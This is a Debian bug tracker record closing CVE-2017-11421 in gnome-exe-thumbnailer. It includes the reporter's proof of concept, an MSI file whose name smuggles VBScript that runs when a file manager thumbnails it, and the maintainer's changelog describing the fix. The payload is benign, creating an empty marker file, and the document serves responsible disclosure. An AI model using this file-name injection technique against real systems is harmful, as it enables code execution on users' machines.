[pkg-wine-party] Bug#868705: marked as done (gnome-exe-thumbnailer: CVE-2017-11421: Thumbnail generation for MSI files executes arbitrary VBScript)

[owner@bugs.debian.org (Debian Bug Tracking System)]

Your message dated Tue, 18 Jul 2017 19:51:04 +0000
with message-id <E1dXYWO-0000W4-LY@fasolo.debian.org>
and subject line Bug#868705: fixed in gnome-exe-thumbnailer 0.9.5-1
has caused the Debian Bug report #868705,
regarding gnome-exe-thumbnailer: CVE-2017-11421: Thumbnail generation for MSI files executes arbitrary VBScript
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact owner@bugs.debian.org
immediately.)


-- 
868705: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=868705
Debian Bug Tracking System
Contact owner@bugs.debian.org with problems

--- Begin Message ---

• To: Debian Bug Tracking System <submit@bugs.debian.org>
• Subject: gnome-exe-thumbnailer: Thumbnail generation for MSI files executes arbitrary VBScript
• From: Nils Dagsson Moskopp <nils+debian-reportbug@dieweltistgarnichtso.net>
• Date: Mon, 17 Jul 2017 23:01:42 +0200
• Message-id: <[🔎] 150032530207.9507.14135120544829383621.reportbug@lustschutzbunker.localdomain>

Package: gnome-exe-thumbnailer
Version: 0.9.4-2
Severity: grave
Tags: security
Justification: user security hole

Dear Maintainer,

the following PoC is copied verbatim from my post about the parsing issue:
http://news.dieweltistgarnichtso.net/posts/gnome-thumbnailer-msi-fail.html

Proof of Concept

Install Dependencies

On Debian GNU/Linux, install the packages gnome-exe-thumbnailer, nautilus and wixl. The wixl package is only needed to create MSI files that trigger the thumbnailer.

If the proof of concept does not work, install winetricks and run winetricks wsh56 to upgrade the Windows Script Host.

Create MSI Files

Create a file named poc.xml with the following content:

<?xml version="1.0" encoding="utf-8"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi";>
<Product Version="1.0"/>
</Wix>

Execute the following Bourne Shell code:

wixl -o poc.msi poc.xml
cp poc.msi "poc.msi\",0):Set fso=CreateObject(\"Scripting.FileSystemObject\"):Set poc=fso.CreateTextFile(\"badtaste.txt\")'.msi"

Trigger Execution

Start GNOME Files and navigate to the folder with the MSI files. An empty file with the name badtaste.txt should appear.

*** End of the template - remove these template lines ***


-- System Information:
Debian Release: 9.0
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 3.16.0-4-686-pae (SMP w/1 CPU core)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: sysvinit (via /sbin/init)

Versions of packages gnome-exe-thumbnailer depends on:
ii  icoutils                         0.31.2-1.1
ii  imagemagick                      8:6.9.7.4+dfsg-11
ii  imagemagick-6.q16 [imagemagick]  8:6.9.7.4+dfsg-11
ii  libglib2.0-bin                   2.50.3-2

Versions of packages gnome-exe-thumbnailer recommends:
pn  wine                                                                 <none>
pn  wine64-tools | wine32-tools | wine64-development-tools | wine32-dev  <none>

gnome-exe-thumbnailer suggests no packages.

-- no debconf information

--- End Message ---

--- Begin Message ---

• To: 868705-close@bugs.debian.org
• Subject: Bug#868705: fixed in gnome-exe-thumbnailer 0.9.5-1
• From: James Lu <bitflip3@gmail.com>
• Date: Tue, 18 Jul 2017 19:51:04 +0000
• Message-id: <E1dXYWO-0000W4-LY@fasolo.debian.org>

Source: gnome-exe-thumbnailer
Source-Version: 0.9.5-1

We believe that the bug you reported is fixed in the latest version of
gnome-exe-thumbnailer, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 868705@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
James Lu <bitflip3@gmail.com> (supplier of updated gnome-exe-thumbnailer package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Tue, 18 Jul 2017 08:18:48 +0800
Source: gnome-exe-thumbnailer
Binary: gnome-exe-thumbnailer
Architecture: source
Version: 0.9.5-1
Distribution: unstable
Urgency: high
Maintainer: Debian Wine Party <pkg-wine-party@lists.alioth.debian.org>
Changed-By: James Lu <bitflip3@gmail.com>
Description:
 gnome-exe-thumbnailer - Wine .exe and other executable thumbnailer for GNOME
Closes: 868705
Changes:
 gnome-exe-thumbnailer (0.9.5-1) unstable; urgency=high
 .
   [ Stephen Kitt ]
   * Fix the filename mangling in debian/watch.
 .
   [ James Lu ]
   * New upstream release.
     - Switch to msitools' msiinfo for ProductVersion fetching, replacing the
       insecure VBScript-based parsing as described at
       http://news.dieweltistgarnichtso.net/posts/gnome-thumbnailer-msi-fail.html
       (Closes: #868705; LP: #651610; CVE-2017-11421).
   * Add Enhances: caja, tumbler (>= 0.1.92~), nautilus, nemo
     These are some of the many file managers/thumbnailer programs that support
     desktop thumbnailers like exe-thumbnailer, and I have verified (at some
     point) that all of these work.
   * fallback-thumbnail-limit.patch: drop, applied upstream.
   * Bump Standards-Version to 4.0.0; no changes needed.
   * Add msitools to recommends; it is used to fetch .msi version info.
Checksums-Sha1:
 4355e1bc808c0390ffc6c049cc0cdd2069ff8835 2071 gnome-exe-thumbnailer_0.9.5-1.dsc
 1d72428b14402601d5f7d9962dbf7d1edea14bdc 55246 gnome-exe-thumbnailer_0.9.5.orig.tar.gz
 0e507cf2dd41121397e1290bcb3d4fda131e75a3 4688 gnome-exe-thumbnailer_0.9.5-1.debian.tar.xz
 bfd6dc806c210373af8be2599a7cf1d14bb459af 5914 gnome-exe-thumbnailer_0.9.5-1_source.buildinfo
Checksums-Sha256:
 2159443d583e73503d4183af1f48352ce6c7d360040872486d5c2aff4c7f7e28 2071 gnome-exe-thumbnailer_0.9.5-1.dsc
 1b59acf7005bf42aca85a71b08a771dc5b74ce44dca1ef34972a876fb4212e2d 55246 gnome-exe-thumbnailer_0.9.5.orig.tar.gz
 eb6d38aa59fde580dddee3b48b81c6e9ed2b51f053c80d75c4e7db5efc1c3159 4688 gnome-exe-thumbnailer_0.9.5-1.debian.tar.xz
 643cf586ef581596206e50e61fb4daeafae71987e816ca8fae13f69d43f64d4c 5914 gnome-exe-thumbnailer_0.9.5-1_source.buildinfo
Files:
 caea506e039c66cbbdc1546978015b58 2071 gnome optional gnome-exe-thumbnailer_0.9.5-1.dsc
 c933062c81fb1d55c7037271db99785a 55246 gnome optional gnome-exe-thumbnailer_0.9.5.orig.tar.gz
 9edd8dfdd80b14dcbcc81afde71ea318 4688 gnome optional gnome-exe-thumbnailer_0.9.5-1.debian.tar.xz
 d09a9f110dd043d5d7169261ef626daf 5914 gnome optional gnome-exe-thumbnailer_0.9.5-1_source.buildinfo

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEnPVX/hPLkMoq7x0ggNMC9Yhtg5wFAlluYI0ACgkQgNMC9Yht
g5wBLQ//RWSk7pTwl9SizslpFxQ6nE8VE6JB+eww8HRnoezgXvqK76qAvfc6/17t
iwc+mdmj9gMyEyV8BA2YCzatvkKYLmfNZDFmBEd7pEHPIdB9gIakSpxvdlzW2Z4S
XxyzrAIRP/upOagNg0inZqXeEFSe/SI3389ogvi+NaSffkZ/8B8UHINZ7UKRUc6n
zOvuCocP95O8HLxfEYGG1G7eU+SsNAUtIB9PJD4brUzq0AW2nglxfkxurCdZxBjI
O5GFnq8xvgbbMS/jqHo9DJulDj74p3N3W8+Jiy0px+CelsUJ8dTrF14FZM6gMcjt
Tcyax41Otpu9le+rRAz67qobvGZXZdpnmpAYNed9U078KHy3edYOhNxkW9nKAJ9X
VC6rNbq9QwKvjroJnol3PBJ/EOzLYsIGD0aPnYtLdrHthO4GTfPiE0xvyGwR9KZ/
5ALWEeCowSk77Lx01z4fq34euquNVMhTb6iaNyReIpCVDSmZYL2RBJFbKQP9Ar1v
vk2Nc4j6VhWOtJWXJh+mwdDAKuNM+Ud0gG1fUspcRpU0So61TUAx6EvAYVho5DLF
0r6ufBWd6dni+SOHpwTdlZxUUc0HtIs6x2OGVODiTHNxk3YeNlIzeyLine9iu6dg
2MaQXkUPsqUmJV6JXm1hYr3VEpvseRo/PDm4WdGWlpf6qTFw7bg=
=iYvD
-----END PGP SIGNATURE-----

--- End Message ---